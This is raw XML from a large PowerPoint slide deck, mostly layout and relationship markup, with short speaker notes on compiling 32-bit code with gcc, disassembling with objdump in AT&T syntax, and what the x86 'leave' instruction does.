    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2472">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="43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96" autoAdjust="0"/>
    <p:restoredTop sz="92623" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="137" d="100"/>
          <a:sy n="137" d="100"/>
        </p:scale>
        <p:origin x="1520" y="184"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2472"/>
        <p:guide pos="4336"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="16" y="2004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9" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="-3352"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424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide423.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notesMaster" Target="notesMasters/notesMaster1.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196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide416.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165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide164.xml"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide371.xml"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide231.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide273.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91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide90.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide144.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide186.xml"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide351.xml"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide393.xml"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide407.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419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide418.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430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.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slide" Target="slides/slide408.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420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide419.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431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.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220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide219.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427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.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200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide381.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide241.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide283.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222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide221.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide263.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2F0151-EC07-934A-AE26-1DBB68DC41B8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/31/18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B47CE2-62FE-FC4C-963B-9645AF7FF934}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9259783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8267C-E060-7343-A0FE-934AF6E9F7DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/31/18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32F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405988780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41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4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32F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952597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0FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10178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377940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AEACDB-B906-604F-9596-A356FFF83653}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>279</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178626"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78627"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83646413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12582A-19E8-1F4D-B2E6-1BB396287E8A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>281</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987138"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987139"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96361732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82AFF5-6917-A84F-B64A-C999F77C370C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>294</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001474"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001475"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16420679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15B600-353B-F847-B869-B75CBF3BDC13}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>295</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003522"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003523"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90499486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0855BD-8DFD-0446-B339-8AA2D5736E5F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>297</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7311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3378329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A7A400-9464-A246-A8FD-341A0539CBB9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>298</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024002"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024003"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95875535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6B2099-CB10-F447-AD2F-F4141DCD1ADB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>299</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158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228338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2C7A35-9423-7A48-A7E2-6A7024257A73}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>300</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034242"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034243"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91944881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FB3197-F8A7-EF45-8780-48ED4DDDC73D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>301</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159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622819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E37639-0B8A-C34B-B268-B7BC03A98E9A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>302</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040386"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040387"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812708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135FE7-AEDA-6648-AFAA-5B077E7D38B8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10188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053506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F50341-6726-4B41-BA79-1709C3FF5E3B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>303</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042434"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042435"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5878421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0BC575-FAD5-544E-BFA4-EB2031DCCB1C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>304</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044482"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044483"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64770505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EEC64F-7865-E840-8D46-962E474FC53C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>305</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046530"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046531"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49993401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244CBD-8333-1040-A182-DB92073C855B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>306</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048578"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048579"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64249569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034342-D9F7-894B-9C97-48D0AA1B6BED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>307</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161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3136889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C7AEFF-6F6D-D64A-B241-07009E522ECB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>308</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050626"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050627"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74665175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4FAAED-716C-1A48-9B39-85CCDBDFB540}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>309</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="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1054723"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81076467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282056-A24B-DC46-9706-0F1C41D4ABF0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>310</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="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1056771"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85131425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0E1BF8-FCEC-DE48-BF40-E7CD10D958B9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>311</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058818"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058819"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83474952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22DEEB-3841-F841-A394-D182B2149B49}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>312</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060866"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060867"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959415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292E0D-4BA6-0D48-852F-B87226DEA1CC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052674" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052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4849685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43E451-545C-704B-82A8-4E7537A3A6F4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>313</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062914"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062915"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31436164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094041-1F1B-5A47-ACAF-A36A7B4F31DB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>314</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11622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0611291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439A51-F68F-DB44-86A0-A479873F844B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>315</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163266" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163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5714692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0AA16B-7E54-AE4F-8B76-FAEF718F98C5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>316</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164290" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11642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8148142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D92C71-5BC8-664B-9C36-2A8DB3D17AB9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>317</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11653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6275831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18F9B2-4F83-B346-A2FF-E607E3CE705A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>318</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11663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6560663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4809B6-0721-B44F-93FE-4A3529BF3F18}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>319</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160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8254541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B9A7DC-617D-7241-8731-AA38312809E9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>323</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12482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0655250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D2544A-444A-AC44-8626-EEBE420A2983}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>325</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232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4949428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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>326</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="557200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32592A-B447-4747-B2BF-056FA96C4987}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019906" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10199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033937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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>347</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200122993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930F36-5AFA-A64D-B224-CC3F763AE386}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>411</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191938" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11919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3816333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E0BBC0-E44C-A440-963D-0C6AED8A9A4B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>413</a:t>
